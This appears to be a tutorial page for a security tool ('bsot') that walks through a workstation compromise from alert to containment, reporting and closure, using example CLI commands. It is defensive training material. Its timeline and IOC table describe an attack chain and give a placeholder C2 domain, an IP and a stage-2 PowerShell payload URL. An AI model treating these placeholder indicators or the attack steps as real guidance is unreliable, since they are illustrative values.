Incident Response¶
From detection to containment to documentation.
Scenario¶
An alert fires indicating potential compromise of a workstation. The security team needs to investigate, contain the threat, and document findings.
Phase 1: Initial Response¶
Create Investigation Case¶
bsot case new compromised-workstation-ws42 \
--type intrusion \
--severity critical \
--analyst "Jane Doe"
Document Initial Alert¶
bsot case timeline "EDR alert: Suspicious PowerShell activity on WS42" \
--time "2025-01-15 14:30:00"
bsot case note "Alert from CrowdStrike: Encoded PowerShell execution detected"
Phase 2: Evidence Collection¶
Collect Artifacts from System¶
Sample Output
══════════════════════════════════════════════════════════
Forensic Artifact Collection
══════════════════════════════════════════════════════════
Profile: full
Hostname: WS42
Collecting artifacts...
✓ Collection complete
Output directory: ./evidence/ws42
Files collected: 47
Total size: 2.3 MB
── Artifacts Collected ───────────────────────────────────
• system/processes
• system/connections
• system/users
• system/scheduled_tasks
• system/startup_items
• system/installed_software
• logs/security
• logs/system
• logs/powershell
Create Evidence Manifest¶
Add Evidence to Case¶
Phase 3: Log Analysis¶
Analyze Authentication Logs¶
Sample Output
══════════════════════════════════════════════════════════
Log Analysis Results
══════════════════════════════════════════════════════════
── Findings (2) ──────────────────────────────────────────
[HIGH] Suspicious Login Pattern
User: admin
MITRE: T1078 - Valid Accounts
Multiple failed logins followed by success from new IP
Events: 15
[MEDIUM] Off-Hours Activity
User: admin
Time: 02:15:00 UTC
Activity during non-business hours
Analyze PowerShell Logs¶
Phase 4: Malware Analysis¶
Decode Suspicious Script¶
Sample Output
Extract IOCs from Script¶
Phase 5: Threat Intelligence¶
Enrich Discovered IOCs¶
# Enrich C2 domain
bsot intel enrich evil.com
# Bulk enrich all IOCs
bsot intel bulk -f all_iocs.txt --json -o enriched_iocs.json
Check WHOIS¶
Phase 6: Containment¶
Block Attacker IP at Cloudflare¶
Generate Local Containment Commands¶
bsot ir contain --block-ip 203.0.113.50 --platform windows
bsot ir contain --disable-user compromised_admin --platform windows
Document Containment Actions¶
bsot case timeline "Blocked C2 IP 203.0.113.50 at Cloudflare"
bsot case timeline "Disabled compromised admin account"
bsot case timeline "Isolated workstation WS42 from network"
Phase 7: Investigation Notes¶
bsot case note "Attack vector: Phishing email with malicious attachment"
bsot case note "Initial access: 2025-01-15 02:15 UTC via RDP"
bsot case note "Lateral movement: Attempted access to file server FS01"
bsot case note "C2 communication: evil.com (203.0.113.50)"
bsot case note "Data exfiltration: No evidence of data theft"
Phase 8: Reporting¶
Generate Executive Report¶
Generate Technical Report¶
Export IOCs¶
# For SIEM/SOAR
bsot report ioc --format stix -o reports/iocs.stix.json
# For blocklists
bsot report ioc --format csv -o reports/blocklist.csv
Export Timeline¶
Phase 9: Case Closure¶
Package Case¶
Close Case¶
Complete Timeline¶
| Time | Event |
|---|---|
| 02:15 | Attacker gains RDP access using stolen credentials |
| 02:17 | PowerShell executes encoded command |
| 02:18 | Stage 2 payload downloaded from C2 |
| 02:20 | Attempt to access file server FS01 (failed) |
| 14:30 | EDR alert triggered |
| 14:35 | Investigation started |
| 14:45 | Artifacts collected |
| 15:00 | C2 identified and blocked |
| 15:15 | User account disabled, system isolated |
| 16:00 | Analysis complete |
| 17:00 | Reports generated |
IOCs Discovered¶
| Type | Value | Context |
|---|---|---|
| IP | 203.0.113.50 | C2 server |
| Domain | evil.com | C2 domain |
| URL | http://evil.com/stage2.ps1 | Payload URL |
| Hash | abc123... | Malicious script |
Lessons Learned¶
- MFA would have prevented the initial RDP access
- PowerShell logging was critical for detection
- Network segmentation blocked lateral movement
- Rapid response prevented data exfiltration